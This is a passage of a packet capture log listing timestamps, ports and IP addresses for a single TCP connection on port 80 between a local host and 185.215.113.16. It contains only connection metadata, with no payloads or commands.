Nov 4, 2024 17:32:18.274131060 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.274142981 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.274143934 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.274185896 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.274374008 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.274384022 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.274416924 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.274439096 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.274446011 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.274487972 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.274523973 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.274534941 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.274558067 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.274569988 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.274710894 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.274751902 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.274771929 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.274782896 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.274804115 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.274817944 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.274926901 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.274966002 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.274972916 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.274983883 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.275006056 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.275015116 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.275022984 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.275048971 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.275078058 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.275111914 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.275357008 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.275383949 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.275397062 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.275399923 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.275424004 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.275446892 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.275527000 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.275538921 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.275551081 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.275567055 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.275590897 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.275659084 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.275665998 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.275702953 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.320137024 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.320199966 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.320353031 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.320369959 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.320383072 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.320394039 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.320395947 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.320405006 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.320405006 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.320419073 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.320430040 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.320430994 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.320449114 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.320458889 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.320472956 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.320529938 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.395407915 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.395423889 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.395437002 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.395457029 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.395466089 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.395493984 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.395510912 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.395555973 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.395569086 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.395580053 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.395591974 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.395596027 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.395617962 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.395637989 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.395731926 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.395745039 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.395808935 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.395827055 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.395870924 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.395906925 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.395917892 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.395946026 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.395950079 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.395965099 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.395971060 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.395993948 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.396009922 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.396050930 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.396063089 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.396090984 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.396102905 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.396116018 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.396128893 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.396138906 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.396151066 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.396162987 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.396174908 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.396198988 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.396794081 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.396831989 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.396908998 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.396927118 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.437699080 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.437712908 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.437732935 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.437743902 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.437755108 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.437773943 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.437813044 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.437819958 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.437824011 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.437839031 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.437854052 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.437856913 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.437880993 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.437911034 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.437942028 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.437953949 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.437994003 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.512660027 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.512677908 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.512690067 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.512701988 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.512713909 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.512723923 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.512737036 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.512748003 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.512765884 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.512818098 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.512892008 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.512903929 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.512916088 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.512937069 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.512957096 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.513053894 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.513065100 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.513082027 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.513101101 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.513125896 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.513138056 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.513138056 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.513173103 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.513286114 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.513329029 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.513336897 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.513361931 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.513382912 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.513401985 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.513458967 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.513499975 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.513530016 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.513541937 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.513569117 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.513585091 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.513601065 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.513639927 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.513659000 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.513669968 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.513694048 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.513705015 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.513752937 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.513766050 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.513776064 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.513797998 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.513816118 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.554837942 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.554853916 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.554864883 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.554877996 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.554933071 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.554940939 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.554943085 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.555000067 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.555027008 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.555038929 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.555048943 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.555073023 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.555089951 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.555169106 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.555212021 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.555243015 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.555257082 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.555284977 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.555300951 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.629791975 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.629813910 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.629825115 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.629844904 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.629863977 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.629877090 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.629888058 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.629899025 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.629910946 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.629915953 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.629928112 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.629935980 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.629939079 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.629955053 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.629995108 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.630053043 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.630065918 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.630075932 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.630088091 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.630089998 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.630100012 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.630116940 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.630141973 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.630505085 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.630517960 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.630528927 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.630539894 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.630553007 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.630553961 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.630574942 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.630599976 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.630640030 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.630655050 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.630670071 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.630677938 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.630681992 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.630692959 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.630696058 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.630709887 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.630714893 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.630743027 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.630764008 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.631272078 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.631344080 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.631370068 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.631412029 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.671859980 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.671888113 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.671900988 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.671984911 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.672019958 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.672032118 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.672092915 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.672092915 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.672092915 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.672092915 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.672094107 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.672152996 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.672172070 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.672183990 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.672202110 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.672219992 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.672349930 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.672360897 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.672372103 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.672398090 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.672414064 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.672426939 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.672467947 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.672574043 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.672616005 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.746973038 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.747123003 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.747137070 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.747154951 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.747167110 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.747178078 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.747190952 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.747221947 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.747222900 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.747262955 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.747271061 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.747282028 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.747292042 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.747303009 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.747319937 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.747330904 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.747339010 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.747383118 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.747493029 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.747556925 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.747562885 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.747575998 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.747613907 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.747627974 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.747633934 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.747646093 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.747657061 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.747669935 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.747690916 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.747731924 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.747750998 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.747802019 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.747876883 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.747925997 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.747934103 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.747946024 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.747989893 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.748064041 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.748075962 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.748092890 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.748104095 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.748116016 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.748150110 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.748150110 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.748172045 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.748219967 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.788954020 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.789047956 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.789060116 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.789125919 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.789125919 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.789125919 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.789180040 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.789242029 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.789251089 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.789268017 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.789279938 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.789320946 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.789326906 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.789340973 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.789386034 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.789386034 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.789484978 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.789494991 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.789505005 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.789515972 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.789544106 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.789544106 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.789608955 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.829709053 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.829741955 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.829755068 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.829921007 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.829921007 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.863996983 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.864015102 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.864026070 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.864074945 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.864128113 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.864139080 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.864171982 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.864269972 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.864280939 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.864300013 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.864310980 CET	80	49990	185.215.113.16	192.168.2.5
